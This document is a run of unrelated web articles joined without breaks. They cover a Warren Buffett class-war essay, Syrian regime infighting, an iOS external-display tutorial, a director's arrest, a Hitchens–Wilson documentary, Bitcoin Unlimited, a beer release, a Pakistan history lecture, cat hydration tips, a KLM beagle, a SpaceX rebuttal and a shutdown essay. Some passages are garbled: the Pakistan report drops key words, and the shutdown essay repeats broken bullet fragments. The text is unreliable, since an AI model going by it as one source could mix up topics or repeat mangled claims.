It is disturbing that such a lawsuit is necessary. It is disturbing that a corporation can use the state to exercise this sort of control and intimidation against small farmers. It is perhaps more disturbing that a billionaire who invests in and profits from these coercive business practices is being held up as a progressive icon.
Time to Fight Back in the Class War
Warren Buffett famously said “There's class warfare, all right, but it's my class, the rich class, that's making war, and we're winning.” Buffett was talking about the tax code, but that barely scratches the surface of the violent and rapacious class warfare the super-rich are waging against ordinary people. It becomes a bit difficult to make tax law your top priority when you realize that labor leaders are being murdered, unnecessary wars are being fought, peaceful people are put in prison, and farmers are coerced into bankruptcy, all for the sake of corporate profits. Changes to the tax code will never fix that. So what will?
Every problem I have identified here stems from the same source: Unaccountable centralized power. When a centralized state is granted the power to wage war, its killings are presumed to be “policy” rather than crimes, and corporations can influence state policy, wars for profit are the inevitable result. When a centralized state is given the power to lock up peaceful people in cages, it will. When businesses are owned and controlled by a few wealthy investors and CEO's rather than through workers' self management, the workers will see their material conditions suffer and their free association under vicious assault. People should have control over their own lives, rather than seeing their most important decisions made from Washington, DC or some corporate boardrooms. It's time to build a real resistance to coercive power and authority. It's time to resist wars and prisons, to stand up for workers, to build networks of mutual aid, to create grassroots alternatives to government programs and capitalist corporations. It's time to build a new society in the shell of the old.
This is a message you won't receive from Warren Buffett. Surface changes to the tax code would give him a slightly more stable society with a happier population. But he would still be able to profit from rapacious violence and coercion against poor and working people. A real revolution, a society in which people organize from the bottom up and reject institutional violence, would be disastrous for Warren Buffett. Because in a free society, billionaires like Buffett might have to learn to work for a living.
Translations for this article:
The Assad regime has placed its intelligence chief under house arrest after suspecting he was plotting a coup, in a sign that battlefield losses are setting off increasing paranoia in Damascus .
Ali Mamlouk, the head of the country's National Security Bureau, and one of the few officials still to have access to President Bashar al-Assad, was accused of holding secret talks with countries backing rebel groups and exiled members of the Syrian regime.
Mr Assad is struggling to keep together the regime's "inner circle", who are increasingly turning on each other, sources inside the presidential palace have told The Telegraph.
Even before Mamlouk's arrest, the web of intelligence agencies with which the regime has enforced its authority for four decades was in turmoil, with two other leaders killed or removed.
Last month, Rustum Ghazaleh, the head of the Political Security Directorate, died in hospital after he was physically attacked by men loyal to General Rafiq Shehadeh, his opposite number in military intelligence, who was in turn sacked.
The role being played in the war by Iran, Syria's regional ally, is said to be at the heart of the arguments, with some of the “inner circle” afraid that Iranian officials now have more power than they do.
Iran's influence has been crucial in bolstering Syria's defences against the rebels, but even that has been crumbling in the face of recent rebel advances in the north.
It was as Syrian troops lost control of Idlib city and Jisr al-Shughour to an alliance of Islamist rebels including Jabhat al-Nusra, al-Qaeda's local branch, that Mamlouk reportedly began to make contact with hostile governments and former regime officials.
"Mamlouk had been communicating with Turkish intelligence through an intermediary," said a senior regime source with direct knowledge of the plan.
Mamlouk had also used a businessman from Aleppo as an intermediary to contact Rifaat al-Assad, Bashar's uncle, who has lived abroad exile since he was accused of seeking to mount a coup in Syria in the 1980s.
Rifaat al-Assad declined to comment on the reports, but one informed source, who asked not to be named, said that " there is a big interest among the Syrian officers and military for Rifaat Assad to come back to Syria”.
The late Syrian president Hafez al-Assad, right, with his youngest brother Rifaat in 1984 (AFP)
Iranian operatives in Syria are believed to have taken command of large areas of government, from the central bank to the battle strategy.
"Most of the advisers at the presidential palace are now Iranian," said a source close to the palace. "Mamlouk hated that Syria was giving her sovereignty up to Iran. He thought there needed to be a change.”
Ghazaleh is believed to have shared this view of the Iranian influence.
Like Mamlouk, Ghazaleh was born to a Sunni Muslim family, and was opposed to the power being acquired in the country by Shia Iran's Revolutionary Guard and its Lebanese proxy Hizbollah.
Issam al-Reis, a spokesman for the Southern Front rebel groups, who are fighting close to Ghazaleh's home village in Deraa, said intelligence picked up from captives and others suggested Ghazaleh was fiercely hostile to Iran.
“He was complaining that he and his men were being treated like scum, whilst the Iranians and their militias were lords,” he said.
"Shehadeh arrested two of Ghazaleh's nephews from his home town because they had refused to fight under Iranian command. Ghazaleh went to the military intelligence headquarters to defend them and get them released, but there Shehadeh's men beat him."
Suffering from brain damage, Ghazaleh spent several weeks in hospital before the regime formally announced his death on 24th April.
Mr Reis's account was corroborated by two sources inside the regime, who asked to remain anonymous.
The regime in Syria is of critical importance to Iran, who uses Syria as the primary route through which to arm Hizbollah.
With the fortunes of the two regimes so inextricably linked, Iran has bankrolled and provided the expertise and the weapons for President Assad's war.
Syria's ailing economy would likely have collapsed were it not for the credit facility provided by Tehran – more than $15 billion to date, according to Damascus' finance minister.
Last month, when senior officials in Syria's regime made one of their regular visits to Tehran, the meetings were tense, and at sometimes fraught, a source close to the Iranian government told the Telegraph.
"Members of the regime said that they were losing control of Syria. At one point they even suggested considering cutting a deal with the opposition," the source said.
"The Iranians were furious, after all they had done to help. They would not lose control."
Charles Lister, a Syria expert with the Brookings Institution said that recent events have left the regime facing its most critical situation in years.
“Iran appears to be calling the shots now,” said Mr Lister. “This is partly from the fear that the regime might collapse from the inside out. Tehran is trying to create a brick wall around them.”
The iPhone and iPad are awesome devices with beautiful displays. Sometimes though, we might want to show parts of our app on a bigger, external screen.
Today we'll look at how we can do just that on iOS, let's dive in.
Before we begin let's break down what exactly we're talking about here:
UIKit exposes any external display we connect to our iPhone or iPad with an adapter as a UIScreen . The same is also true when we turn-on Airplay Mirroring to an Apple TV.
Now, let's write some code.
We'll eventually use Notifications to learn when a screen is connected/disconnected, but many users may launch our app with a screen already connected, so let's start by checking for that.
We'll create a couple instance properties to hold our the UIWindow and UIViewController we'll be displaying externally:
var externalDisplayWindow : UIWindow ? var externalDisplayVC : StatusBoardViewController ?
Next, we'll make a function we can call when our app first launches, and when a new display is connected:
func checkForExternalDisplay () { guard let screen = UIScreen . screens . last else { return }
We'll create a new UIWindow and assign it to the external UIScreen :
if externalDisplayWindow == nil { externalDisplayWindow = UIWindow ( frame : screen . bounds ) externalDisplayWindow ? . screen = screen }
Next, we'll need a view controller. We'll create one and set it as the rootViewController just like usual:
if externalDisplayVC == nil { externalDisplayVC = StatusBoardViewController () externalDisplayWindow ? . rootViewController = externalDisplayVC
Last but not least, we'll show the window by setting its isHidden property to false .
externalDisplayWindow ? . isHidden = false } }
If we connect a display now, and launch our app, we'll see our content displayed externally, neat!
Let's finish up by wiring up those notifications we mentioned earlier. First we'll start observing them:
NotificationCenter . default . addObserver ( forName : NSNotification . Name . UIScreenDidConnect , object : nil , queue : nil , using : displayConnected ) NotificationCenter . default . addObserver ( forName : NSNotification . Name . UIScreenDidDisconnect , object : nil , queue : nil , using : displayDisconnected )
Then we'll write those two functions to handle each notification:
func displayConnected ( notification : Notification ) { checkForExternalDisplay () } func displayDisconnected ( notification : Notification ) { externalDisplayWindow ? . isHidden = true externalDisplayVC = nil externalDisplayWindow = nil }
Now our app will start/stop showing on the external display automatically when the user connects it. Very cool.
There's plenty more to dive into when working with external displays and UIScreen . We'll go further in future Bites.
That's all for today. Have an idea or request for a Bite? Send it along to hello@littlebitesofcocoa.com!
Television director Jason “Jace” Alexander—not to be confused with Seinfeld star Jason Alexander—was arrested in New York on Wednesday on child pornography charges, CBS New York reports.
In addition to directing 32 episodes of Law & Order, Alexander is the Second Vice-President of the Director's Guild of America and is credited for 18 episodes of Rescue Me.
According to Westchester County prosecutors, an investigator was able to download child pornography from an IP address determined to be assigned to the director's house. From The Wrap:
After a search warrant was executed at Alexander's home address, a forensic examination of computers and external hard drives removed from the location revealed digital files of children who are less than 16 years of age engaged in child pornography, according to the DA.
Alexander now faces one felony count of promoting a sexual performance by a child and one felony count of possessing an obscene sexual performance by a child.
If convicted, he reportedly faces up to seven years in prison.
[Image via Westchester County District Attorney//h/t ET]
COLLISION carves a new path in documentary film-making as it pits leading atheist, political journalist and bestselling author Christopher Hitchens against fellow author, satirist and evangelical theologian Douglas Wilson, as they go on the road to exchange blows over the question: "Is Christianity Good for the World?".
The two contrarians laugh, confide and argue, in public and in private, as they journey through three cities. And the film captures it all. The result is a magnetic conflict, a character-driven narrative that sparkles cinematically with a perfect match of arresting personalities and intellectual rivalry.
In May 2007, leading atheist Christopher Hitchens and Christian apologist Douglas Wilson began to argue the topic "Is Christianity Good for the World?" in a series of written exchanges published in Christianity Today. The rowdy literary bout piqued the interest of filmmaker Darren Doane, who sought out Hitchens and Wilson to pitch the idea of making a film around the debate.
In Fall 2008, Doane and crew accompanied Hitchens and Wilson on an east coast tour to promote the book compiled from their written debate titled creatively enough, Is Christianity Good for the World?. “I loved the idea of putting one of the beltway's most respected public intellectuals together with an ultra-conservative pastor from Idaho that looks like a lumberjack”, says Doane. "You couldn't write two characters more contrary. What's more real than a fight between two guys who are on complete opposite sides of the fence on the most divisive issue in the world? We were ready to make a movie about two intellectual warriors at the top of their game going one-on-one. I knew it would make an amazing film."
There has been a lot of debate whether or not Bitcoin Unlimited can become a success. A lot of people feel this will not be the case, whereas the /r/btc community will gladly tell you otherwise. Soupernerd, a former /r/btc moderator, stated how BU has been “knocked out of the running” to become a bitcoin fork. A very unusual statement that will raise a lot of questions, that much is certain.
Whether one agrees with Bitcoin Unlimited or not, the project offers a different perspective on scaling bitcoin. While Segregated Witness is a valid solution as well, an alternative view is never a bad thing. However, when one of their former moderators loses confidence in the project, things are not evolving in the right direction.
Soupernerd Loses Confidence in Bitcoin Unlimited
Soupernerd, a former /r/btc moderator, has always been supporting of Bitcoin Unlimited so far. However, something has changed over the past few days, albeit no one knows what exactly. For some reason, he seems far less optimistic about BU's chance of success. In fact, his latest tweet goes to show he feels BU has no longer any chance to fork bitcoin whatsoever. A very strange sentiment, that much is certain.
#bitcoin's BU has for all intents and purposes just been knocked out of the running as a potential fork candidate. Oh well #BitcoinUnlimited — SouperNerd 𓅓 (@SouperNerd) March 15, 2017
Some people on Reddit are kind of surprised by this statement. After all, a long-term supporter of Bitcoin Unlimited turning on the project is unexpected. There is a rumor of how Soupernerd's account has been sold to a third party, although that has not been confirmed at this time. Then again, there have been some incidents which reduce BU's chance of success. The most recent issue revolves around the node bug, which put the entire project in a negative spotlight.
At the same time, it is evident the Bitcoin Unlimited developers have some issues they need to overcome. Properly testing tools before deploying them on the main net would be a great start. The seeming lack of experience, although that can be overcome by putting more hours into coding. Soupernerd feels it is time to “rethink anti-core bias”. On the topic of funding, he is confident Bitcoin Core has the best cards as well, for the time being.
Header image courtesy of Shutterstock
With apologies to my friends that own other local breweries, I don't know if there is a beer in St. Louis that has as much buzz as Perennial Artisan Ale‘s barrel-aged Abraxas. It's easily one of the most sought after beers in the area and for good reason, last year's version of BA Abraxas was one of the best beers I enjoyed last year (and this year as well, it still tastes amazing.)
Well, it's been almost 18 months since that original release and frankly, beer nerds are getting antsy. People are clamoring for news about the release of this epically enjoyable beer. Well, I have it for you.
Option 1: Early Reservation
For you locals, hope you didn't have plans to go out of town this weekend (and if you're not local, hope your plans involved visiting our fair city during this long holiday) because this Friday, May 23rd, Perennial will begin an early reservation list for two bottles (per reservation) beginning at 6PM. Perennial promises 400 reservations will be made available during this early sign up.
If you plan on coming out to stand in line on Friday to secure your reservation, Perennial understand that bottle shares typically break out during these line-waiting ceremonies. A bottle share will be permitted on the patio, but out of respect to Perennial's neighbors and Perennial's staff, they ask that the bottle share end at 4PM.
Option 2: Lottery
But what about those of you who can't make it on this Friday? You're not out of luck, Perennial will be doing an online lottery beginning Thursday, May 29th at 12AM and will be ending the lottery Monday, June 2nd at 12AM. There will be a link on Perennial's website (http://www.perennialbeer.com) where you will be asked to provide your name and email address so Perennial can contact you if you're lucky enough to win. (Make sure to double-check that information before hitting send! Also, multiple entries will be discarded, so… don't be that guy.)
If you're on the list for the early reservation, you're still eligible to enter the lottery. Lottery winners will be notified if they've won on Monday, June 2nd. This lottery will be for a single bottle of BA Abraxas.
Bottle Pickup
You've won! Good for you! Now, how do you get your bottles? Here's the breakdown.
For those of you who got in via early reservation, you can pick up on the following days:
Friday, June 6th 4:00-10:00PM
Saturday, June 7th Noon-11:00PM
Wednesday, June 11 4:00-10:00PM
Thursday, June 12th 4:00-10:00PM
Friday, June 13th 4:00-11:00PM
Saturday, June 14th Noon-11:00PM
For those of you who have won the lottery, you can pick up on the following days:
Saturday, June 7th Noon-11:00PM
Wednesday, June 11 4:00-10:00PM
Thursday, June 12th 4:00-10:00PM
Friday, June 13th 4:00-11:00PM
Saturday, June 14th Noon-11:00PM
Now you know when you can pick them up, what will you need? Well, each bottle is $30 a piece (tax is included) and an original, photocopied, or mobile photo of a valid state ID will be required upon pickup (for those of you looking to proxy for some friends.)
Any unclaimed bottles will go to me! No wait, they'll go on sale in the Perennial tasting room on Wednesday, June 18th at 4PM. There will also be limited draft available of BA Abraxas on Friday, June 6th and Saturday, June 7th.
Good luck and may the odds be ever in your favor.
Historian and political economist Akbar S. Zaidi has dismissed "the victory myth" regarding the 1965 Pakistan- war, saying that can be no a bigger lie, as lost terribly.
According to the Dawn, Zaidi's comments came during his thought-provoking lecture titled 'Questioning Pakistan's history', just two days away from observing Defence Day and marking the 50th anniversary of the 1965 war in the country.
He said that the history that is taught in is not focused on the people of the country, but rather on the making of
Zaidi began the lecture by thought provoking questions such as "what is Pakistan's history and is there a need to question Pakistan's history. And when was Pakistan formed? Aug 14, 1947 or Aug 15, 1947".
Zaidi read out an excerpt from a Pakistan Studies textbook in which it was claimed Pakistan came into being in 712 A D when the Arabs came to Sindh and Multan. He exclaimed "This is utter rubbish!"
He said the first interaction with Muslims and Arabs occurred in Kerala in South for trading purposes.
Zaidi also said that the 1940 Pakistan Resolution called for the recognition of Muslims within Hindustan and not for a separate entity.
He also criticised how history in Pakistan is taught to students.
It is focused on rulers and generals and not on social history, he said.
The event was organised by the Faculty of Social Sciences, Karachi University.
Tag INFORMATION
INFORMATION HEALTH
HEALTH PICTURES
As you may know, kidney failure is the number one cause of death in cats. For elderly cats, chronic kidney failure is said to be one of the most common illnesses that leads to death.
Chronic kidney failure develops in approximately 30% of cats around the age of 15 and is difficult to cure. Cats are originally desert animals and, therefore, less inclined to drink water.
However! If you want your cat to live a long life, it is your duty as its protector to protect it from developing kidney failure.
Today you will be introduced to 7 tips for getting your cat to drink a little more water.
1.Increase the ratio of wet food
The majority of owners probably feed their pets dry food, but cats tend to eat more when they are given wet food.
Generally, wet food consists of 75~80% water. To a degree, you can alleviate dehydration by feeding your cat wet food.
2.Increase the number of feedings
According to findings from a 2005 study conducted by an international research organization, the amount of water intake increases considerably when feedings are increased from once a day to three times per day.
3.Always have fresh water available
Cats like fresh water. You may be aware that many cats like to drink from the faucet. Try to provide fresh water frequently throughout the day. Given that most cats are disposed to drink water at night, it would be a good idea to make it a habit of putting fresh water out every night before you go to sleep.
4.Use a wide-mouthed water dish
In the case of highly sensitive cats, a mere touch of their whiskers on something will distract them from eating or drinking. That may be why they prefer drinking water from bathtubs and sinks.
I encourage you to select a feeding dish that is large enough to clear the width of your cat's whiskers.
5.Try different kinds of water
Cats are finicky when it comes to the taste and temperature of water. By trying different kinds of water, e.g., cold water, warm water, purified water and bottled water, you should be able to find the kind of water your cat likes best.
6.Try soup
My vet once recommended giving my cat soup stock made from fish and chicken because it is flavorful.
A simple soup with no added flavoring is absolutely fine, of course. The more popular stocks are made from boiled white chicken meat or clams. Just don't forget to cool it down before serving it to your cat.
7.Place distance between your cat's water dish and litter box
Cats have an acute sense of smell. If their water dish is dirty or it is near their litter box, the smells might bother then and they'll no longer want to drink.
Please be sure to keep their water dishes clean and away from litter boxes and other odorous places.
So, what do you think? These 7 tips may seem unusual, but if you try them, you'll find them quite effective.
As you know, when the weather is nice, cats will spend the entire day just lounging around, and then be raring to go at night. On days like these, give them something to drink and they'll gulp it down.
It is also just as important to have your cat watch you wash its bowl and fill it with lots of fresh water.♪
As you care for your beloved cat, please protect it from kidney failure by keeping these 7 tips in mind.
It's no secret that traveling can be a pain. For most people, spending a number of hours on a cramped, stuffy airplane is not ideal. Throw in expensive meals (that years ago you didn't have to pay for) and a small viewing screen with poor audio on the seat in front of you, and you can see why some people are off-put by this mode of travel. Sure, the end destination will keep your spirits up - that is, if you're headed on vacation - but that won't take away the suffering you may or may not experience while on a metal tube shooting through the sky at incredible speeds.
Advertisement
Alas, people fly every day, at all times of the day. One Amsterdam airline is doing their part to ease one potential problem of taking long trips. At KLM airlines, if you happen to leave a personal belonging on a flight, they'll do their best to track you down. But you've likely seen a lost and found service like this one. KLM has recruited one special guest to help them return items: Sherlock the Beagle.
In response to Elon Musk's announcement of a new transportation concept , R. D. Brewer wrote a post at Ace of Spades which cited this bit of ignorant, snarky, bravo sierra by Craig Pirrong, which itself cites some two-year-old lies by bought-and-paid-for Lockheed Martin lobbyist Loren Thompson:
…consider SpaceX. This venture provides evidence of Musk's love for Occupy: he has promised that this private space venture will go to Mars, and wears an Occupy Mars shirt to make the point. It is also touted as a privately capitalized space venture, which it is, I guess, but it is also almost completely dependent on government contracts. The private money is attracted by the scent of public money. Sorry, but a company that is dependent on NASA's IV for support is not truly a private company: the company is basically a cutout between the investors and the taxpayers. The company has not exactly covered itself in glory. It had serious trouble with its initial launches, including an embarrassing episode in which the ashes of Star Trek's Scotty, James Doohan, were on a SpaceX craft that didn't make it into space: it crashed instead somewhere in the South Pacific. Which I guess would have been great if James Doohan had starred in South Pacific. Don't worry, though. As a precaution, some of Mr. Doohan's ashes were retained, and that part of the beloved actor's remains did make it into space as he desired. And speaking of Broadway and movie classics, Musk is auditioning for a role in a summer stock Music Man with his boosterism of SpaceX: You don't have to be a believer in conspiracy theories to wonder why senior government officials are so committed to going the commercial route in space. Even a cursory review of SpaceX programs and plans reveals reasons for doubt. The questions begin with a business strategy that isn't just disruptive, but downright incredible. Mr. Musk says that he can offer launch prices far below those quoted by any traditional provider — including the Chinese — by running a lean, vertically integrated enterprise with minimal government oversight that achieves sizable economies of scale. The economies of scale are possible, he contends, because there is huge pent-up demand for space travel in the marketplace that cannot be met within the prevailing pricing structure. By dropping prices substantially, this latent demand can then be unlocked, greatly increasing the rate of rocket production and launches. When combined with other features of the SpaceX business model, the increased pace of production and launches results in revolutionary price reductions. There isn't much serious research to demonstrate that the pent-up demand Musk postulates really exists, nor that the price reductions he foresees are feasible. He has suggested in some interviews that launch costs could decline to a small fraction of current levels if all the assumptions in his business plan come true, and he has posted a commentary on his web-site explaining how SpaceX is already able to offer the lowest prices in the business. It's hard to look inside the operations of a private company, but SpaceX does seem to be doing all the things necessary to minimize costs such as using proven technology, building as many items as possible in-house, and hiring a young workforce willing to work long hours. And to his credit, Musk has committed over $100 million of his own money to the venture. However, his rockets have major performance limitations compared with other launch vehicles in the market, and they are not yet rated as safe for carrying people. Becoming “man-rated” will necessarily increase the role of federal officials in monitoring SpaceX operations, which is not good news for a business model grounded in minimal government oversight (traditional launch providers say government regulations and overhead charges are a key driver in their own pricing policies). Downright incredible sounds about right. It sounds like a con to me. Especially the whole “economy of scale” thing. That's the kind of thing defense contractors say to get the government to buy more units of a plane or ship. It's not good economics. And Musk's winning personality was on display when questioned about SpaceX's launch failures: Mr. Musk recently responded to a question from Space News reporter Amy Svitak about the two-year delay in accomplishing that second Falcon 9 launch by observing, “In the space business that's on time.” Perhaps he was irritated by the reporter's implied criticism, but it goes without saying that if astronauts on board the space station are awaiting supplies, a prolonged launch delay could spell big trouble. What a guy. Takes your money, and then gets peevish when you accuse him he's blowing it.
Phew. Well, first, Thompson's libelous, deceitful nonsense was ably responded to at the time by Bobby Block.
Whether or not Mr. Pirrong finds it credible or not, the fact is that Elon Musk has developed an entire company, two launch vehicles and a manufacturing facility for them, test facilities, launch pads and its own mission control for about the cost of a single Space Shuttle launch. He has broken the NASA/Air-Force Cost Model (NAFCOM) which would have predicted his system development to cost from three to ten times more than it actually ended up being.
The other fact is that the company is not on a “NASA IV,” or “completely dependent on government contracts” (though that's certainly true of, e.g., Lockheed Martin). It has a solid order book, with many commercial launches on the manifest, the most recent of which was from the Canadian company MacDonald Dettwiler & Associates a couple weeks ago to launch their new radar satellites. It is taking back the foreign satellite launch sales that American industry had abandoned to foreign competition in the nineties because Atlas and Delta had been priced out of the market by Europe, Russia and China. Now, the company even has the Chinese running scared, because they can't compete against it, even with a taxpayer-subsidized system.
And speaking of taxpayer subsidies, the only taxpayer money the company has ever taken was not (unlike Tesla) in the form of guaranteed loans, but simply as fee for payment for fixed-price milestones, in order to accelerate the development of the Dragon cargo (and soon, crew) capsule. This will enable it to resupply the ISS, and reduce (and eventually, hopefully eliminate) our reliance on the Russians for its support. That is to say, NASA needs SpaceX much more than SpaceX needs NASA's money. Without the NASA contracts, the company would simply be doing commercial launches, and developing the Dragon at a more leisurely pace. The ultimate and much larger market for the system is to support private space facilities, such as those being developed by Bigelow Aerospace, in the latter part of the decade. And yes, launch delays are in fact entirely normal for this industry, as are failures of early test flights, from which the company has obviously learned lessons, since it has never suffered a significant failure of the Falcon 9. No one at the ISS was going hungry waiting for the Dragon delivery, because the Russians have been delivering cargo.
As for the other nonsense, I'm aware of no evidence that Elon is supportive of the Occumorons, and I certainly saw none presented here. From what I know of him (and we've spoken a few times), I find that highly improbable. If he ever did wear an “Occupy Mars” shirt (again, I await evidence), it would be much less indicative of any sympathy for the police-car poopers than as an expression of his oft-stated goal of sending thousands there, and retiring there himself.
As for Tesla, which is a completely different business model than SpaceX, I don't think that taxpayers should subsidize loans for anything, but if the government is handing out money for a business in which you're engaged, it would be just as foolish to turn it down as to not take advantage of every tax break when you do your personal return. And unlike Solyndra, which went mammaries up with taxpayers holding the bag, Tesla has repaid its loans in full ahead of schedule. I don't know whether the company will be successful or not, or whether it could survive absent idiotic subsidies from California, but at this point it doesn't really matter to the taxpayers.
Now, I don't think that Elon is a saint, and there are certainly some things for which to criticize him. I think he's working very hard to build a company, but not hard enough to build an industry, and he's reportedly pretty hard on both his people and his vendors, with a lot of churn in his growing company. But that's not atypical of Silicon Valley, which is the model for all his companies, rather than the traditional hierarchical aerospace industry model. It seems to be working, at least in terms of revolutionary reductions in the cost of space access -- with a promise of much more if he can get the reusability for which he's ultimately aimed. I don't know whether or not the hyperloop makes any economic sense (though I suspect that it's certainly technically feasible), but if you're going to criticize him, as many who love to hate on him seem determined to do at every opportunity, it would be nice if, just once in a while, the criticism would have some basis in reality.
The sheer fiscal insanity and spineless leadership that infects Washington is only exacerbated by the American people's defense of these thugs based upon their team colors. When will the American people realize that they themselves are the butt of a bad joke?
by Jerry Robinson
Amid the recent U.S. government shutdown, both political parties have been refining their talking points in an effort to gain public support for their positions.
As usual, the political theater has led to a new and obnoxious blame game. The Democrats point their finger at the House Republicans citing their obsession with defunding Obamacare and their failure to pass a “clean” continuing resolution (spending bill) as the reason for the partial government shutdown.
Meanwhile, House Republicans have fired back by highlighting the “unfairness” of Obamacare and claiming the new law will bankrupt America.
And, in typical fashion, those who still choose to believe the ridiculous words gushing out of the mouths of political leaders from both sides of the aisle have come out swinging for their respective party.
Quick Disclaimer : Due to the politically hostile nature of our culture, I must regularly remind our readership of my political atheism to avoid the inevitable buckets of hate mail. So, here's my disclaimer once again: While I have little sympathy for either party, I do admit that I find myself repulsed by many of the policies promoted by the Democrats. However, it is the doublespeak of the Republican party that provides me with the highest entertainment value. I compare my interest in the Washington political machine with that of a bad car wreck. Rubberneckers slow down as they drive by a massive car accident. We don't want to look, but we can't help ourselves. While I know this is a crude comparison, it is fitting in so many ways. Now, back to the article…
The political wrangling in Washington has crippled the democratic process. Years of gargantuan spending levels on the “warfare and welfare” state by both political parties have driven our nation to the edge of financial insolvency. And it is getting worse, not better, by the day.
Of course, neither party appears interested in taking responsibility for the fiscal train wreck that awaits America. Instead, as Rome burns, our elected officials engage in intellectual jousting matches cleverly designed to cast all blame on their opponents.
One recent example of the political blame game comes from one of the political writers that I have admired for years: Thomas Sowell.
In a recent article entitled, Who Shut Down the Government?, Sowell applies his mostly clear-eyed analysis to sorting out the facts of the current government shutdown debacle.
“Even when it comes to something as basic, and apparently as simple and straightforward, as the question of who shut down the federal government, there are diametrically opposite answers, depending on whether you talk to Democrats or to Republicans. There is really nothing complicated about the facts. The Republican-controlled House of Representatives voted all the money required to keep all government activities going — except for ObamaCare.” This is not a matter of opinion. You can check the Congressional Record.”
Sowell is absolutely correct. Republicans did indeed vote to spend “all of the money required to keep all government activities going…”
Republicans voted to keep giving money to:
The Department of Homeland Security , and its bogus “security theatrics” including the $30,000+ annual salaries for every single TSA goon that gropes grandma
, and its bogus “security theatrics” including the $30,000+ annual salaries for every single TSA goon that gropes grandma The National Security Agency , along with its vast domestic surveillance capabilities that has turned America into a police state
, along with It's that has turned America into a entire military-industrial complex , including billions of dollars in defense contracts and our global war machine
, including billions of dollars in defense contracts and our global war machine Every single government entitlement program including the Social Security ponzi scheme
including the And trillions of dollars more for other “essential” government services
But I can already hear someone protesting: “All those things are out of the House's control.”
If that is your belief, let's permit more space for Mr. Sowell to correct you.
“As for the House of Representatives' right to grant or withhold money, that is not a matter of opinion either. You can check the Constitution of the United States. All spending bills must originate in the House of Representatives, which means that Congressmen there have a right to decide whether or not they want to spend money on a particular government activity .”
That's right. Sowell explains that it is the House that gets to decide whether the nation spends money on a “particular government activity.”
Wow! What a time to remind the American people who have control of America's purse strings.
So, while government spending levels spiral out of control, the House has decided that it only wants a fight to defund Obamacare. This is rather convenient for the GOP, considering Obamacare has not yet had a chance to permeate the nation. I think that honest hard-working Americans should hold their applause and standing ovations for these “sudden fiscal conservatives” who want to defund one government program while funding other similar programs at extreme levels.
After all, if the GOP is so “gung-ho” to stop the rampant growth in government spending, why stop at Obamacare? Don't get me wrong. I would love to see Obamacare defunded and replaced with a free market solution. But I am more interested in seeing across the board cuts to ALL government programs in order to stave off an inevitable default in the years ahead.
Since the House has the responsibility of “approving all government spending,” can anyone answer why these “sudden fiscal conservatives” have refused to defund the existing entitlement programs that pose a much more grave threat to our Republic? After all, both parties have given the current House plenty of entitlement reform opportunities.
According to a fiscal analysis by the Office of Management and Budget, over the next decade:
Social Security will cost U.S. taxpayers $11 trillion
will cost U.S. taxpayers $11 trillion Medicare will cost a whopping $8 trillion
will cost a whopping $8 trillion And Medicaid will cost U.S. taxpayers $4.3 trillion
In comparison, the nonpartisan CBO has projected that, over the next decade, Obamacare will cost taxpayers $1.8 trillion.
So, the basic arithmetic suggests that these “sudden fiscal conservatives” are picking on the littlest guy in the room.
Obamacare is an easy target for the GOP simply because they don't have to take away benefits from anyone. Why? Because the plan is just now being implemented.
Can you imagine if these “sudden fiscal conservatives” were to apply the same political strength to an effort to defund Social Security, which currently send checks to 62 million beneficiaries? Or what about defunding Medicare which provides health coverage to over 48 million Americans?
These “sudden fiscal conservatives” won't even touch their own Republican-inspired entitlement programs. They seemingly ignore President Bush Jr's disastrous Medicare Prescription Drug Act, which will cost U.S. taxpayers $1.1 trillion over the next decade. In fact, several of these GOP con-men were standing, all grins, next to President George W. Bush as he signed the Medicare Prescription Drug Act into law.
The sheer fiscal insanity and spineless leadership that infects Washington is only exacerbated by the American people's defense of these thugs based upon their team colors. When will the American people realize that they themselves are the butt of a bad joke?
Deficits (and Defaults) Don't Matter?
Another interesting talking point that the GOP has concocted is that the U.S. will not default if the debt ceiling is not increased. This logic is rooted in the fact that America would only “technically” enter a state of default if it somehow failed to pay the interest on the existing national debt.
As Sowell explains:
“Perhaps the biggest of the big lies is that the government will not be able to pay what it owes on the national debt, creating a danger of default. Tax money keeps coming into the Treasury during the shutdown, and it vastly exceeds the interest that has to be paid on the national debt. Even if the debt ceiling is not lifted, that only means that government is not allowed to run up new debt. But that does not mean that it is unable to pay the interest on existing debt.”
At first glance, this may sound great to fiscal conservatives. However, the logic of this argument is terribly flawed. While it is true that the Federal government currently collects just over $200 billion per month in tax revenue, they spend more than $300 billion each month!
Do you really trust these inept political leaders to manage this situation, if it were to occur? And what 1/3 of our current spending would politicians cut? It's a guarantee that if any of these cuts occur to anything near and dear to the hearts of the GOP, they will be the first to claim a “default.”
As an economist, I can tell you that it is absolutely absurd to think that if the Federal government experienced an immediate 35%+ spending reduction everything would be just “fine.” Those who buy this flawed argument obviously do not understand that America is nothing more than an economic house of cards. The American economy runs on “confidence.” (Consumer “confidence,” business “confidence,” investor “confidence,” etc.) Because the U.S. dollar has no real backing (except for the “full faith and credit of the Federal government”) all that remains is “confidence.”
Put simply, if America's political leaders do anything to tamper with, let alone destroy, the “confidence” that America is able or willing to pay all of its obligations, it would immediately send financial shockwaves around the world.
No matter what the GOP may say publicly, this government shutdown has little to do with “taking fiscal responsibility” or “protecting the economic future of our kids and grandkids.” If it really did, then Republicans would have taken the axe to government entitlement spending long ago. While those phrases sound good and get votes, in reality they do not motivate the 99.9% of politicians.
A Revolution is Brewing
Finally, I question the wisdom of Mr. Sowell, a champion of the right, delivering such plain civic lessons to a nation that is clearly on the verge of a new revolution. In his article, Sowell attempts to blame the Democrats by pointing to the Constitutional spending powers bestowed upon the House. However, his myopic argument inadvertently exposed openly that the GOP has the right “to fund or not fund” whatever they wish. Oops. To the millions that are just now waking up all around the country to America's true financial situation, perhaps this knowledge may be better left unspoken.
After all, if the masses ever fully realize that it is the House Republicans that hold within their power the ability to “defund” the military-industrial complex, the NSA, all of the wars, along with a myriad of government programs that threaten to bankrupt the Republic, it could spell trouble.
If America's fiscal patriots were ever to grasp that it is the “small government conservatives” in the House that wield the authority to “defund” bailouts, the failed drug war, the bloated Department of Education, the IRS, Washington's massive military expenditures, and the growing American police state, they may just finally understand how similar Washington's political parties really are.
The ironies are almost too great to bear. The Republican party's choice for President in 2012? Mitt Romney, who provided the inspiration for Obamacare through his own Romneycare.
Or what about the Republican party's choice for President in 2008? John McCain, the completely out-of-touch global military adventurist who claimed the fundamentals of the U.S. economy were “very strong” and “entirely sound” just weeks before the deepest U.S. economic collapse since the Great Depression.
That the American people continue to allow their emotions and intellects to be hijacked by Washington's antics in 2013 is simply astonishing.
